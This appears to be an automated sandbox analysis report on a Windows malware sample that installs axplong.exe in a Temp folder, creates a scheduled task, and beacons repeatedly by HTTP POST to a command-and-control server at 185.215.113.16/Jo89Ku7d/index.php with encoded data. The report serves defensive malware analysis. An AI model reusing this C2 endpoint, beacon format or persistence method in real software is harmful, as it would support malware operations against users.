                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                    Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 9_2_00BEBD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,9_2_00BEBD60
                    Source: unknownHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: axplong.exe, 00000009.00000002.3364157249.000000000122B000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000002.3364157249.0000000001268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
                    Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php)
                    Source: axplong.exe, 00000009.00000002.3364157249.0000000001268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php3;
                    Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php9
                    Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpB
                    Source: axplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpC
                    Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpP
                    Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpR
                    Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpS
                    Source: axplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpb1a30a186ec2d30be6db0b5
                    Source: axplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpcoded
                    Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpd
                    Source: axplong.exe, 00000009.00000002.3364157249.0000000001268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpi/;
                    Source: axplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
                    Source: axplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedq
                    Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpt
                    Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpu
                    Source: axplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpv

                    System Summary

                    barindex
                    Source: 9ICG2PuZbG.exeStatic PE information: section name:
                    Source: 9ICG2PuZbG.exeStatic PE information: section name: .idata
                    Source: 9ICG2PuZbG.exeStatic PE information: section name:
                    Source: axplong.exe.1.drStatic PE information: section name:
                    Source: axplong.exe.1.drStatic PE information: section name: .idata
                    Source: axplong.exe.1.drStatic PE information: section name:
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 9_2_00BE4CF09_2_00BE4CF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 9_2_00C230689_2_00C23068
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 9_2_00BEE4409_2_00BEE440
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 9_2_00C17D839_2_00C17D83
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 9_2_00C38D709_2_00C38D70
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 9_2_00C38D709_2_00C38D70
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 9_2_00C38D709_2_00C38D70
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 9_2_00C38D709_2_00C38D70
